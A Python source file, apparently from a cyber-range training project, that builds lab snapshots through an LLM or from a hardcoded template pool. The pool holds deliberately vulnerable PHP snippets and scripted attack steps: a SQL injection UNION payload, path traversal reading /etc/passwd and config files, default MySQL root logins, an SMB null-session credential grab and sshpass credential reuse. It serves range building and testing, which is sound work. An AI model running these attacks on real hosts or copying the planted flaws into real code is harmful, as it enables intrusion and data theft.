"""Three SnapshotBuilder implementations for OpenRange. - LLMSnapshotBuilder: production -- uses litellm to generate snapshot specs - TemplateOnlyBuilder: testing -- deterministic, no LLM calls - FileBuilder: demos -- loads a pre-built snapshot from a JSON file Each builder implements the SnapshotBuilder protocol and returns a validated SnapshotSpec that can be rendered into Docker artifacts by the SnapshotRenderer. """ from __future__ import annotations import json import logging import os import random import re from copy import deepcopy from pathlib import Path, PurePosixPath from typing import Any, Optional from pydantic import BaseModel, Field try: import litellm except ImportError: # pragma: no cover - exercised only without builder extra litellm = None from open_range.protocols import ( BuildContext, EvidenceItem, ExploitStep, FlagSpec, GoldenPathStep, NPCPersona, NPCTrafficSpec, SnapshotSpec, TaskSpec, TruthGraph, Vulnerability, ) from open_range.builder.prompts import BUILDER_SYSTEM_PROMPT from open_range.builder.manifest_graph import ( compile_manifest_topology, runtime_contract_from_topology, ) logger = logging.getLogger(__name__) # --------------------------------------------------------------------------- # LLM raw output model -- matches the LLM's JSON schema exactly # --------------------------------------------------------------------------- class _LLMVulnerability(BaseModel): """Raw vulnerability as returned by the LLM.""" id: str = "" type: str = "" host: str = "" service: str = "" injection_point: str = "" vulnerable_code: str | dict[str, str] = "" root_cause: str = "" blast_radius: str = "" remediation: str = "" class _LLMExploitStep(BaseModel): """Raw exploit step -- LLM uses 'vuln'/'action'/'yields' field names.""" vuln: str = "" vuln_id: str = "" action: str = "" command: str = "" yields: str = "" description: str = "" class _LLMGoldenPathStep(BaseModel): """Raw golden path step -- LLM uses 'cmd' and 'expect_stdout'.""" step: int = 0 cmd: str = "" command: str = "" expect_stdout: str = "" expect_in_stdout: str = "" description: str = "" host: str = "attacker" class _LLMFlag(BaseModel): """Raw flag definition from LLM output.""" id: str = "" value: str = "" path: str = "" host: str = "" class _LLMNPCPersona(BaseModel): """Raw NPC persona from LLM output.""" name: str = "" role: str = "" department: str = "" reports_to: str = "" communication_style: str = "" security_awareness: float = 0.5 susceptibility: dict[str, Any] = Field(default_factory=dict) routine: dict[str, Any] = Field(default_factory=dict) accounts: dict[str, Any] = Field(default_factory=dict) class _LLMTruthGraph(BaseModel): """Raw truth graph from LLM output.""" vulns: list[_LLMVulnerability] = Field(default_factory=list) exploit_chain: list[_LLMExploitStep] = Field(default_factory=list) class _LLMTask(BaseModel): """Raw task specification from LLM output.""" red_briefing: str = "" blue_briefing: str = "" class LLMSnapshotOutput(BaseModel): """Intermediate model matching the LLM's raw JSON schema. This captures the exact field names the LLM produces, including known mismatches like 'vuln' vs 'vuln_id', 'cmd' vs 'command', and 'expect_stdout' vs 'expect_in_stdout'. Parsing into this model first makes schema mismatches explicit and testable before mapping to the canonical SnapshotSpec. """ topology: dict[str, Any] = Field(default_factory=dict) truth_graph: _LLMTruthGraph = Field(default_factory=_LLMTruthGraph) golden_path: list[_LLMGoldenPathStep] = Field(default_factory=list) flags: list[_LLMFlag] = Field(default_factory=list) evidence_spec: dict[str, Any] | list[dict[str, Any]] = Field(default_factory=dict) npc_personas: list[_LLMNPCPersona] = Field(default_factory=list) npc_traffic: dict[str, Any] = Field(default_factory=dict) task: _LLMTask = Field(default_factory=_LLMTask) files: dict[str, Any] = Field(default_factory=dict) # --------------------------------------------------------------------------- # LLM-based builder (production) # --------------------------------------------------------------------------- class LLMSnapshotBuilder: """Generate snapshot specs via LiteLLM. Reads model from ``OPENRANGE_BUILDER_MODEL`` env var. Default: ``azure/gpt-5.2-codex``. """ def __init__( self, model: str | None = None, prompt_template: str | None = None, temperature: float | None = 0.7, max_retries: int = 3, max_tokens: int = 32768, timeout: float = 600.0, ) -> None: """Initialize the LLM-based snapshot builder. Args: model: LiteLLM model identifier (e.g. 'azure/gpt-5.2-codex'). prompt_template: System prompt override. temperature: Sampling temperature for LLM calls. None to omit (required for codex models which don't support temperature). max_retries: Maximum number of LLM call + parse attempts. max_tokens: Maximum tokens in LLM response. timeout: Timeout in seconds for each LLM call. """ self.model = model or os.environ.get( "OPENRANGE_BUILDER_MODEL", "azure/gpt-5.2-codex" ) self.prompt_template = prompt_template or BUILDER_SYSTEM_PROMPT # Codex models don't support temperature; auto-set to None if temperature is not None and "codex" in self.model.lower(): self.temperature = None else: self.temperature = temperature self.max_retries = max_retries self.max_tokens = max_tokens self.timeout = timeout async def build( self, manifest: dict, context: BuildContext, ) -> SnapshotSpec: """Call LLM to generate a candidate snapshot spec. Retries on LLM or parse failures, appending error context to each subsequent attempt so the LLM can self-correct. """ if litellm is None: raise RuntimeError( "LLMSnapshotBuilder requires the optional builder extra. " "Install with `pip install open-range[builder]`." ) user_payload = ( "Generate a complete cybersecurity range snapshot as valid JSON.\n\n" + json.dumps( { "manifest": manifest, "runtime_context": context.model_dump(), }, indent=2, ) ) logger.info( "LLMSnapshotBuilder: starting build (model=%s, tier=%d)", self.model, context.tier, ) last_error: Exception | None = None last_error_msg: str = "" for attempt in range(1, self.max_retries + 1): try: messages: list[dict[str, str]] = [ {"role": "system", "content": self.prompt_template}, {"role": "user", "content": user_payload}, ] # If retrying after a failure, append error context so LLM can fix if attempt > 1 and last_error_msg: messages.append( { "role": "user", "content": ( "Previous attempt failed. " f"Error: {last_error_msg}\n" "Please fix and regenerate the complete JSON." ), } ) kwargs: dict[str, Any] = { "model": self.model, "messages": messages, "max_tokens": self.max_tokens, "timeout": self.timeout, } # Codex models don't support temperature if self.temperature is not None: kwargs["temperature"] = self.temperature # Request JSON output; some models need the word "json" # in messages to use json_object format kwargs["response_format"] = {"type": "json_object"} logger.debug( "LLMSnapshotBuilder: sending request (attempt %d/%d, timeout=%.0fs)", attempt, self.max_retries, self.timeout, ) response = await litellm.acompletion(**kwargs) raw = response.choices[0].message.content logger.debug( "LLMSnapshotBuilder: received response (%d chars)", len(raw) if raw else 0, ) spec = _parse_llm_response(raw) logger.info( "LLMSnapshotBuilder: build completed (attempt %d/%d, %d vulns, %d golden path steps)", attempt, self.max_retries, len(spec.truth_graph.vulns), len(spec.golden_path), ) return spec except json.JSONDecodeError as exc: last_error = exc last_error_msg = f"JSON parse error at position {exc.pos}: {exc.msg}" logger.warning( "LLMSnapshotBuilder attempt %d/%d: JSON parse failed: %s", attempt, self.max_retries, last_error_msg, ) except SnapshotParseError as exc: last_error = exc last_error_msg = str(exc) logger.warning( "LLMSnapshotBuilder attempt %d/%d: snapshot parse failed: %s", attempt, self.max_retries, last_error_msg, ) except Exception as exc: last_error = exc last_error_msg = f"{type(exc).__name__}: {exc}" logger.error( "LLMSnapshotBuilder attempt %d/%d failed: %s", attempt, self.max_retries, last_error_msg, ) raise RuntimeError( f"LLMSnapshotBuilder: all {self.max_retries} attempts failed. " f"Last error: {last_error}" ) # --------------------------------------------------------------------------- # Parse error with context # --------------------------------------------------------------------------- class SnapshotParseError(Exception): """Raised when LLM output cannot be parsed into a valid SnapshotSpec. Includes the field that failed, received value, expected format, and a truncated snippet of the raw JSON for debugging. """ def __init__( self, message: str, field: str = "", received: Any = None, expected: str = "", raw_json_snippet: str = "", ) -> None: self.field = field self.received = received self.expected = expected self.raw_json_snippet = raw_json_snippet parts = [message] if field: parts.append(f"field={field!r}") if received is not None: recv_str = repr(received) if len(recv_str) > 200: recv_str = recv_str[:200] + "..." parts.append(f"received={recv_str}") if expected: parts.append(f"expected={expected}") if raw_json_snippet: parts.append(f"raw_json_start={raw_json_snippet!r}") super().__init__(" | ".join(parts)) # --------------------------------------------------------------------------- # LLM response parser # --------------------------------------------------------------------------- def _parse_llm_response(raw_json: str) -> SnapshotSpec: """Parse raw JSON from LLM into a validated SnapshotSpec. First parses into LLMSnapshotOutput (which matches the LLM's field names), then maps to the canonical SnapshotSpec models. Handles known field-name mismatches between the LLM prompt schema and Pydantic models. """ raw_snippet = raw_json[:500] if raw_json else "" try: data = json.loads(raw_json) except json.JSONDecodeError: raise logger.debug("_parse_llm_response: parsing %d-char JSON response", len(raw_json)) # Parse into intermediate model first for early validation try: llm_output = LLMSnapshotOutput.model_validate(data) except Exception as exc: raise SnapshotParseError( "Failed to parse LLM output into LLMSnapshotOutput", field="root", received=type(exc).__name__, expected="valid LLMSnapshotOutput JSON", raw_json_snippet=raw_snippet, ) from exc # Map truth_graph vulns vulns = [] for i, v in enumerate(llm_output.truth_graph.vulns): try: vulns.append( Vulnerability( id=v.id, type=v.type, host=v.host, service=v.service, injection_point=v.injection_point, vulnerable_code=v.vulnerable_code, root_cause=v.root_cause, blast_radius=v.blast_radius, remediation=v.remediation, ) ) except Exception as exc: raise SnapshotParseError( f"Failed to map vulnerability at index {i}", field=f"truth_graph.vulns[{i}]", received=v.model_dump(), expected="valid Vulnerability fields", raw_json_snippet=raw_snippet, ) from exc # Map exploit_chain -- LLM uses "vuln"/"action", protocol uses "vuln_id"/"command" exploit_chain = [] for i, ec in enumerate(llm_output.truth_graph.exploit_chain): vuln_id = ec.vuln_id or ec.vuln command = ec.command or ec.action description = ec.description or ec.yields if vuln_id or command: used_fallback = (not ec.vuln_id and ec.vuln) or (not ec.command and ec.action) if used_fallback: logger.warning( "exploit_chain[%d]: used fallback field names (vuln=%r -> vuln_id, action=%r -> command)", i, ec.vuln, ec.action, ) exploit_chain.append( ExploitStep( vuln_id=vuln_id, command=command, description=description, ) ) truth_graph = TruthGraph( vulns=vulns, exploit_chain=exploit_chain, ) # Map golden_path -- LLM uses "cmd"/"expect_stdout", protocol uses "command"/"expect_in_stdout" # When both are present, 'cmd' takes precedence (LLM prompt uses 'cmd') golden_path = [] for i, step in enumerate(llm_output.golden_path): command = step.cmd or step.command expect = step.expect_stdout or step.expect_in_stdout if step.cmd and not step.command: logger.warning( "golden_path[%d]: used 'cmd' fallback for 'command'", i, ) if step.expect_stdout and not step.expect_in_stdout: logger.warning( "golden_path[%d]: used 'expect_stdout' fallback for 'expect_in_stdout'", i, ) golden_path.append( GoldenPathStep( step=step.step, command=command, expect_in_stdout=expect, host=step.host or "attacker", description=step.description, ) ) # Map flags flags = [] for i, f in enumerate(llm_output.flags): try: flags.append( FlagSpec( id=f.id, value=f.value, path=f.path, host=f.host, ) ) except Exception as exc: raise SnapshotParseError( f"Failed to map flag at index {i}", field=f"flags[{i}]", received=f.model_dump(), expected="valid FlagSpec (id, value, path, host)", raw_json_snippet=raw_snippet, ) from exc # Map evidence_spec -- LLM returns dict or list, protocol expects list[EvidenceItem] evidence_spec: list[EvidenceItem] = [] evidence_raw = llm_output.evidence_spec if isinstance(evidence_raw, dict): logger.debug("evidence_spec: converting dict format to list[EvidenceItem]") for key, val in evidence_raw.items(): if isinstance(val, list): for item in val: evidence_spec.append( EvidenceItem(type="alert", location=key, pattern=str(item)) ) else: evidence_spec.append( EvidenceItem(type="log_entry", location=key, pattern=str(val)) ) elif isinstance(evidence_raw, list): for item in evidence_raw: if isinstance(item, dict): try: evidence_spec.append(EvidenceItem(**item)) except Exception: # noqa: BLE001 logger.warning("Skipping malformed evidence item: %s", item) # Map NPC personas npc_personas = [] for i, p in enumerate(llm_output.npc_personas): try: npc_personas.append( NPCPersona( name=p.name, role=p.role, department=p.department, reports_to=p.reports_to, communication_style=p.communication_style, security_awareness=p.security_awareness, susceptibility=p.susceptibility, routine=p.routine, accounts=p.accounts, ) ) except Exception as exc: logger.warning( "npc_personas[%d]: failed to map persona %r: %s", i, p.name, exc, ) # Map NPC traffic npc_raw = llm_output.npc_traffic npc_traffic = NPCTrafficSpec( level=0, rate_lambda=npc_raw.get("http_rate", 10), scripts=["http_traffic.sh", "db_traffic.sh", "ssh_traffic.sh"], ) # Map task task = TaskSpec( red_briefing=llm_output.task.red_briefing, blue_briefing=llm_output.task.blue_briefing, ) # Map files -- explicit files from LLM + extract from vulnerable_code files: dict[str, str] = {} # 1. Explicit files field from LLM output if isinstance(llm_output.files, dict): for key, content in llm_output.files.items(): if isinstance(content, str): files[key] = content # 2. Extract deployable files from vulnerable_code entries for v in vulns: vc = v.vulnerable_code if isinstance(vc, dict): for file_path, code in vc.items(): container_key = f"{v.host}:{file_path}" if container_key not in files: files[container_key] = code elif isinstance(vc, str) and vc.strip(): ip = v.injection_point if ip.startswith("/") and v.host == "web": web_doc_root = str(llm_output.topology.get("web_doc_root", "/var/www/portal")).rstrip("/") container_key = f"web:{web_doc_root}{ip}" if container_key not in files: files[container_key] = vc logger.debug( "_parse_llm_response: mapped %d vulns, %d golden path steps, %d flags, %d files", len(vulns), len(golden_path), len(flags), len(files), ) return SnapshotSpec( topology=llm_output.topology, truth_graph=truth_graph, golden_path=golden_path, flags=flags, evidence_spec=evidence_spec, npc_personas=npc_personas, npc_traffic=npc_traffic, task=task, files=files, ) # --------------------------------------------------------------------------- # Template-only builder (testing) # --------------------------------------------------------------------------- # Hardcoded vuln pool for deterministic testing _DEFAULT_VULN_POOL: list[dict[str, Any]] = [ { "id": "vuln_sqli", "type": "sqli", "host": "web", "service": "nginx+php", "injection_point": "/search?q=", "vulnerable_code": ( 'query("SELECT * FROM products WHERE name LIKE \'%$q%\'"); ' "while($row=$r->fetch_assoc()) echo $row['name']; ?>" ), "root_cause": "Unsanitized user input in SQL query", "blast_radius": "Full database read access", "remediation": "mv /var/www/portal/search.php /var/www/portal/search.php.disabled", "flag_id": "flag_sqli", "flag_value": "FLAG{sql1_t3st_f1ag}", "flag_path": "/var/flags/sqli_flag.txt", "golden_path_steps": [ { "step": 1, "cmd": "nmap -sV 10.0.1.0/24", "expect_stdout": "80/tcp open http", "host": "attacker", }, { "step": 2, "cmd": "curl http://web/", "expect_stdout": "Welcome", "host": "attacker", }, { "step": 3, "cmd": "curl http://web/search?q=test", "expect_stdout": "product", "host": "attacker", }, { "step": 4, "cmd": "curl 'http://web/search?q=test%27%20UNION%20SELECT%20flag%20FROM%20flags.secrets--%20'", "expect_stdout": "FLAG{sql1_t3st_f1ag}", "host": "attacker", }, { "step": 5, "cmd": "submit_flag FLAG{sql1_t3st_f1ag}", "expect_stdout": "correct", "host": "attacker", }, ], }, { "id": "vuln_idor", "type": "idor", "host": "web", "service": "nginx+php", "injection_point": "/api/users/{id}/profile", "vulnerable_code": ( "query("SELECT * FROM users WHERE id=$id"); ' "echo json_encode($stmt->fetch_assoc()); ?>" ), "root_cause": "No authorization check on user ID parameter", "blast_radius": "User data exposure, credential leakage", "remediation": "Add session-based authorization check before query", "flag_id": "flag1", "flag_value": "FLAG{1d0r_pr0f1le_l3ak}", "flag_path": "db:flags.secrets.flag", "golden_path_steps": [ { "step": 1, "cmd": "nmap -sV 10.0.1.0/24", "expect_stdout": "80/tcp open http", "host": "attacker", }, { "step": 2, "cmd": "curl http://web/", "expect_stdout": "Welcome", "host": "attacker", }, { "step": 3, "cmd": "curl http://web/api/users/1/profile", "expect_stdout": "admin", "host": "attacker", }, { "step": 4, "cmd": "curl http://web/api/users/2/profile", "expect_stdout": "password", "host": "attacker", }, { "step": 5, "cmd": "mysql -h db -u leaked_user -pleaked_pass -e 'SELECT flag FROM flags.secrets'", "expect_stdout": "FLAG{1d0r_pr0f1le_l3ak}", "host": "attacker", }, { "step": 6, "cmd": "submit_flag FLAG{1d0r_pr0f1le_l3ak}", "expect_stdout": "correct", "host": "attacker", }, ], }, { "id": "vuln_path_traversal", "type": "path_traversal", "host": "web", "service": "nginx+php", "injection_point": "/download?file=", "vulnerable_code": ( "" ), "root_cause": "No path sanitization on file parameter", "blast_radius": "Arbitrary file read on web server", "remediation": "mv /var/www/portal/download.php /var/www/portal/download.php.disabled", "flag_id": "flag_path_traversal", "flag_value": "FLAG{p4th_tr4v3rs4l_fl4g}", "flag_path": "/var/flags/path_traversal_flag.txt", "golden_path_steps": [ { "step": 1, "cmd": "nmap -sV 10.0.1.0/24", "expect_stdout": "80/tcp open http", "host": "attacker", }, { "step": 2, "cmd": "curl http://web/", "expect_stdout": "Welcome", "host": "attacker", }, { "step": 3, "cmd": "curl http://web/download?file=report.pdf", "expect_stdout": "PDF", "host": "attacker", }, { "step": 4, "cmd": "curl 'http://web/download?file=../../../etc/passwd'", "expect_stdout": "root:", "host": "attacker", }, { "step": 5, "cmd": "curl 'http://web/download?file=../../../var/flags/path_traversal_flag.txt'", "expect_stdout": "FLAG{p4th_tr4v3rs4l_fl4g}", "host": "attacker", }, { "step": 6, "cmd": "submit_flag FLAG{p4th_tr4v3rs4l_fl4g}", "expect_stdout": "correct", "host": "attacker", }, ], }, { "id": "vuln_weak_creds", "type": "weak_creds", "host": "db", "service": "mysql", "injection_point": "mysql -u root -proot", "vulnerable_code": "", "root_cause": "MySQL root account with default password", "blast_radius": "Full database access", "remediation": "Change root password, restrict remote root login", "flag_id": "flag1", "flag_value": "FLAG{w3ak_cr3ds_r00t}", "flag_path": "db:flags.secrets.flag", "golden_path_steps": [ { "step": 1, "cmd": "nmap -sV 10.0.1.0/24", "expect_stdout": "80/tcp open http", "host": "attacker", }, { "step": 2, "cmd": "nmap -sV 10.0.2.0/24", "expect_stdout": "3306/tcp open mysql", "host": "attacker", }, { "step": 3, "cmd": "mysql -h db -u root -proot -e 'SHOW DATABASES'", "expect_stdout": "flags", "host": "attacker", }, { "step": 4, "cmd": "mysql -h db -u root -proot -e 'SELECT flag FROM flags.secrets'", "expect_stdout": "FLAG{w3ak_cr3ds_r00t}", "host": "attacker", }, { "step": 5, "cmd": "submit_flag FLAG{w3ak_cr3ds_r00t}", "expect_stdout": "correct", "host": "attacker", }, ], }, { "id": "vuln_smb_misconfig", "type": "smb_misconfig", "host": "files", "service": "samba", "injection_point": "smbclient -N //files/general", "vulnerable_code": "", "root_cause": "Samba share allows guest access (null session) — IT enabled it for a migration and never reverted", "blast_radius": "Read access to internal documents, credential files in share", "remediation": "Disable guest access, require LDAP authentication for all shares", "flag_id": "flag1", "flag_value": "FLAG{smb_null_s3ss10n}", "flag_path": "/srv/shares/general/admin_creds.txt", "golden_path_steps": [ { "step": 1, "cmd": "nmap -sV 10.0.1.0/24", "expect_stdout": "80/tcp open http", "host": "attacker", }, { "step": 2, "cmd": "nmap -sV -p 445 10.0.2.0/24", "expect_stdout": "445/tcp open microsoft-ds", "host": "attacker", }, { "step": 3, "cmd": "smbclient -N -L //files/", "expect_stdout": "general", "host": "attacker", }, { "step": 4, "cmd": "smbclient -N //files/general -c 'ls'", "expect_stdout": "admin_creds", "host": "attacker", }, { "step": 5, "cmd": "smbclient -N //files/general -c 'get admin_creds.txt /tmp/creds.txt'", "expect_stdout": "getting file", "host": "attacker", }, { "step": 6, "cmd": "cat /tmp/creds.txt", "expect_stdout": "FLAG{smb_null_s3ss10n}", "host": "attacker", }, { "step": 7, "cmd": "submit_flag FLAG{smb_null_s3ss10n}", "expect_stdout": "correct", "host": "attacker", }, ], }, { "id": "vuln_credential_reuse", "type": "credential_reuse", "host": "ldap", "service": "openldap", "injection_point": "LDAP bind with web app service account credentials", "vulnerable_code": "", "root_cause": "Web app config.php contains LDAP bind DN and password; same credentials reuse for SSH on db host", "blast_radius": "Lateral movement from web → db via credential reuse, flag exfiltration", "remediation": "Unique credentials per service, rotate LDAP bind password, restrict SSH key-only auth", "flag_id": "flag1", "flag_value": "FLAG{cr3d_r3us3_p1v0t}", "flag_path": "/var/flags/flag1.txt", "golden_path_steps": [ { "step": 1, "cmd": "nmap -sV 10.0.1.0/24", "expect_stdout": "80/tcp open http", "host": "attacker", }, { "step": 2, "cmd": "curl 'http://web/download?file=../../../var/www/config.php'", "expect_stdout": "ldap_bind_pw", "host": "attacker", }, { "step": 3, "cmd": "ldapsearch -x -H ldap://{ldap_host} -D '{ldap_bind_dn}' -w '{ldap_bind_pw}' -b '{ldap_search_base_dn}' '(uid=*)'", "expect_stdout": "dn: uid=", "host": "attacker", }, { "step": 4, "cmd": "sshpass -p '{credential_reuse_password}' ssh {credential_reuse_user}@{credential_reuse_host} 'cat /var/flags/flag1.txt'", "expect_stdout": "FLAG{cr3d_r3us3_p1v0t}", "host": "attacker", }, { "step": 5, "cmd": "submit_flag FLAG{cr3d_r3us3_p1v0t}", "expect_stdout": "correct", "host": "attacker", }, ], }, ] class TemplateOnlyBuilder: """Deterministic builder for testing -- no LLM calls. Picks vulnerabilities from a hardcoded pool based on seed. """ def __init__(self, vuln_pool: list[dict[str, Any]] | None = None) -> None: """Initialize with an optional custom vulnerability pool.""" self.vuln_pool = vuln_pool or _DEFAULT_VULN_POOL async def build( self, manifest: dict, context: BuildContext, ) -> SnapshotSpec: """Build a canonicalized snapshot deterministically from templates.""" rng = random.Random(context.seed if context.seed is not None else 42) # Filter pool to allowed bug_families allowed = { str(v).strip() for v in manifest.get("bug_families", []) if str(v).strip() } if allowed: candidates = [v for v in self.vuln_pool if v["type"] in allowed] else: candidates = list(self.vuln_pool) if allowed and not candidates: available = sorted({str(v.get("type", "")).strip() for v in self.vuln_pool if v.get("type")}) requested = sorted(allowed) raise ValueError( "No template vulnerabilities match manifest bug_families. " f"requested={requested}, available={available}" ) if "prefer_live_admission_compatible_vulns" in context.narrative_hints: # Keep strict live admission on task paths the current zone policy # can actually reach from the attacker host. live_supported = {"sqli", "path_traversal"} supported = [v for v in candidates if v["type"] in live_supported] if supported: candidates = supported # Avoid recently used vuln classes previous = set(context.previous_vuln_classes) preferred = [v for v in candidates if v["type"] not in previous] if preferred: candidates = preferred # Pick vulns, respecting tier step target. # Each template vuln contributes ~5 golden path steps, so cap count # to fit within the tier's ±20% step window. from open_range.validator.difficulty import TIER_TARGETS, TOLERANCE tier = int(manifest.get("tier", context.tier) or context.tier) step_target = TIER_TARGETS.get(tier, 8) max_steps_hi = int(step_target * (1 + TOLERANCE)) # Each vuln adds ~5 steps but the first nmap step is shared, so # subsequent vulns add ~4 incremental steps. avg_first = 5 avg_extra = 4 tier_max_vulns = max(1, 1 + (max_steps_hi - avg_first) // avg_extra) max_v_raw = manifest.get("difficulty", {}).get("max_vulns", 2) min_v_raw = manifest.get("difficulty", {}).get("min_vulns", 1) max_vulns = max(1, int(max_v_raw)) min_vulns = max(1, int(min_v_raw)) if min_vulns > max_vulns: min_vulns = max_vulns effective_max = max(1, min(max_vulns, tier_max_vulns, len(candidates))) effective_min = min(min_vulns, effective_max) count = rng.randint(effective_min, effective_max) chosen = rng.sample(candidates, count) # Build topology from manifest topo = manifest.get("topology", {}) hosts = [h["name"] if isinstance(h, dict) else h for h in topo.get("hosts", [])] networks = topo.get("networks", []) zones: dict[str, list[str]] = {} for h in topo.get("hosts", []): if isinstance(h, dict): z = h.get("zone", "default") zones.setdefault(z, []).append(h["name"]) topology: dict[str, Any] = { "tier": int(manifest.get("tier", context.tier) or context.tier), "hosts": hosts, "zones": zones, "difficulty": manifest.get("difficulty", {}), "org_name": manifest.get("company", {}).get("name", "OpenRange"), "domain": manifest.get("company", {}).get("domain", "corp.local"), "users": _manifest_topology_users( manifest, seed=context.seed, weak_creds_enabled=any(v["type"] == "weak_creds" for v in chosen), ), "mysql_root_password": "root" if any(v["type"] == "weak_creds" for v in chosen) else "r00tP@ss!", } topology = compile_manifest_topology(manifest, topology) runtime_contract = runtime_contract_from_topology(topology, manifest=manifest) topology["runtime_contract"] = runtime_contract # Build truth graph vulns = [] exploit_chain = [] flags = [] golden_path: list[GoldenPathStep] = [] step_offset = 0 for idx, raw in enumerate(chosen): v = _realize_template_vuln( raw, topology=topology, runtime_contract=runtime_contract, ) vulns.append( Vulnerability( id=v["id"], type=v["type"], host=v["host"], service=v.get("service", ""), injection_point=v.get("injection_point", ""), vulnerable_code=v.get("vulnerable_code", ""), root_cause=v.get("root_cause", ""), blast_radius=v.get("blast_radius", ""), remediation=v.get("remediation", ""), ) ) exploit_chain.append( { "vuln_id": v["id"], "command": v.get("injection_point", ""), "description": f"Exploit {v['type']} on {v.get('host', 'target')}", } ) flags.append( FlagSpec( id=v.get("flag_id", f"flag{idx+1}"), value=v.get("flag_value", f"FLAG{{test_{idx+1}}}"), path=v.get("flag_path", f"/var/flags/flag{idx+1}.txt"), host=v.get("flag_host", v.get("host", runtime_contract["web_host"])), ) ) for gs in v.get("golden_path_steps", []): cmd = gs["cmd"] # Deduplicate shared recon steps (e.g. nmap) across vulns if any(s.command == cmd for s in golden_path): continue step_offset += 1 golden_path.append( GoldenPathStep( step=step_offset, command=cmd, expect_in_stdout=gs["expect_stdout"], host=gs.get("host", "attacker"), description=gs.get("description", ""), ) ) truth_graph = TruthGraph(vulns=vulns, exploit_chain=exploit_chain) evidence_spec = [ EvidenceItem( type="log_entry", location=f"{runtime_contract['web_host']}:/var/log/app/access.log", pattern="attack pattern from attacker IP", ), EvidenceItem( type="alert", location="siem:/var/log/siem/consolidated/all.log", pattern="Suspicious activity detected", ), ] company = manifest.get("company", {}) if isinstance(manifest.get("company"), dict) else {} company_name = str(company.get("name", "the company")) industry = str(company.get("industry", "corporate")) task = TaskSpec( red_briefing=( f"{topology['org_name']} is a {manifest.get('company', {}).get('industry', 'corporate')} " "company with web and internal services. " "Investigate the environment and capture the flags." ), blue_briefing=( f"You are the SOC analyst for {topology['org_name']}. Monitor the SIEM for suspicious activity, " "investigate alerts, and respond to threats." ), ) npc_traffic = NPCTrafficSpec( level=0, rate_lambda=10.0, scripts=["http_traffic.sh", "db_traffic.sh"], ) snapshot = SnapshotSpec( topology=topology, truth_graph=truth_graph, golden_path=golden_path, flags=flags, evidence_spec=evidence_spec, npc_personas=[], npc_traffic=npc_traffic, task=task, ) snapshot.topology = compile_manifest_topology(manifest, snapshot.topology) snapshot.files = render_template_payloads(snapshot, manifest=manifest) logger.info( "TemplateOnlyBuilder: built snapshot with %d vulns (seed=%s)", len(vulns), context.seed, ) return snapshot # --------------------------------------------------------------------------- # Template payload helpers # --------------------------------------------------------------------------- def _realize_template_vuln( template: dict[str, Any], *, topology: dict[str, Any], runtime_contract: dict[str, str], ) -> dict[str, Any]: realized = deepcopy(template) template_host = str(template.get("host", "")).strip() service = str(template.get("service", "")).strip().lower() resolved_host = _resolve_vuln_host( template_host, service=service, topology=topology, runtime_contract=runtime_contract, ) realized["host"] = resolved_host vuln_type = str(template.get("type", "")).strip() if vuln_type == "credential_reuse": realized["flag_host"] = runtime_contract.get( "credential_reuse_host", runtime_contract.get("db_host", resolved_host), ) else: realized["flag_host"] = resolved_host for field in ( "injection_point", "vulnerable_code", "root_cause", "blast_radius", "remediation", ): value = realized.get(field) if isinstance(value, str): realized[field] = _rewrite_template_runtime_text(value, runtime_contract) raw_steps = template.get("golden_path_steps", []) realized_steps: list[dict[str, Any]] = [] if isinstance(raw_steps, list): for raw_step in raw_steps: if not isinstance(raw_step, dict): continue step = deepcopy(raw_step) cmd = str(step.get("cmd", "")) expect = str(step.get("expect_stdout", "")) step["cmd"] = _rewrite_template_runtime_text(cmd, runtime_contract) step["expect_stdout"] = _rewrite_template_runtime_text(expect, runtime_contract) realized_steps.append(step) realized["golden_path_steps"] = realized_steps return realized def _resolve_vuln_host( template_host: str, *, service: str, topology: dict[str, Any], runtime_contract: dict[str, str], ) -> str: hosts = _host_names(topology.get("hosts", [])) alias_map = { "web": runtime_contract.get("web_host", "web"), "db": runtime_contract.get("db_host", "db"), "ldap": runtime_contract.get("ldap_host", "ldap"), } if template_host: if template_host in hosts: return template_host if template_host in alias_map and alias_map[template_host]: return alias_map[template_host] if any(marker in service for marker in ("mysql", "mariadb", "postgres")): candidate = runtime_contract.get("db_host", "db") if not hosts or candidate in hosts: return candidate if any(marker in service for marker in ("ldap", "openldap")): candidate = runtime_contract.get("ldap_host", "ldap") if not hosts or candidate in hosts: return candidate if any(marker in service for marker in ("nginx", "apache", "http", "php")): candidate = runtime_contract.get("web_host", "web") if not hosts or candidate in hosts: return candidate if template_host: return template_host if hosts: return hosts[0] return runtime_contract.get("web_host", "web") def _host_names(raw_hosts: object) -> list[str]: if not isinstance(raw_hosts, list): return [] hosts: list[str] = [] for raw in raw_hosts: if isinstance(raw, dict): host = str(raw.get("name", "")).strip() else: host = str(raw).strip() if host and host not in hosts: hosts.append(host) return hosts def _rewrite_template_runtime_text(text: str, runtime_contract: dict[str, str]) -> str: if not text: return text web_host = runtime_contract.get("web_host", "web") db_host = runtime_contract.get("db_host", "db") ldap_host = runtime_contract.get("ldap_host", "ldap") web_doc_root = runtime_contract.get("web_doc_root", "/var/www/portal") web_config_path = runtime_contract.get("web_config_path", "/var/www/config.php") db_name = runtime_contract.get("db_name", "referral_db") db_user = runtime_contract.get("db_user", "svc_db") db_password = runtime_contract.get("db_password", "SvcDb!401") ldap_bind_dn = runtime_contract.get("ldap_bind_dn", f"cn={db_user},dc=corp,dc=local") ldap_bind_pw = runtime_contract.get("ldap_bind_pw", db_password) reuse_user = runtime_contract.get("credential_reuse_user", db_user) reuse_host = runtime_contract.get("credential_reuse_host", db_host) reuse_password = runtime_contract.get("credential_reuse_password", ldap_bind_pw) updated = text placeholders = { "{web_host}": web_host, "{db_host}": db_host, "{ldap_host}": ldap_host, "{web_doc_root}": web_doc_root, "{web_config_path}": web_config_path.lstrip("/"), "{db_name}": db_name, "{db_user}": db_user, "{db_password}": db_password, "{ldap_bind_dn}": ldap_bind_dn, "{ldap_bind_pw}": ldap_bind_pw, "{ldap_search_base_dn}": runtime_contract.get("ldap_search_base_dn", "dc=corp,dc=local"), "{credential_reuse_user}": reuse_user, "{credential_reuse_host}": reuse_host, "{credential_reuse_password}": reuse_password, } for placeholder, value in placeholders.items(): updated = updated.replace(placeholder, value) replacements: list[tuple[str, str]] = [ ("http://web/", f"http://{web_host}/"), ("http://web", f"http://{web_host}"), ("ldap://ldap", f"ldap://{ldap_host}"), ("svc_webapp@db", f"{reuse_user}@{reuse_host}"), ("@db ", f"@{db_host} "), ("@db'", f"@{db_host}'"), ('@db"', f'@{db_host}"'), (" -h db ", f" -h {db_host} "), (" -h db", f" -h {db_host}"), ("/var/www/portal", web_doc_root), ("/var/www/config.php", web_config_path), ("referral_db", db_name), ("app_user", db_user), 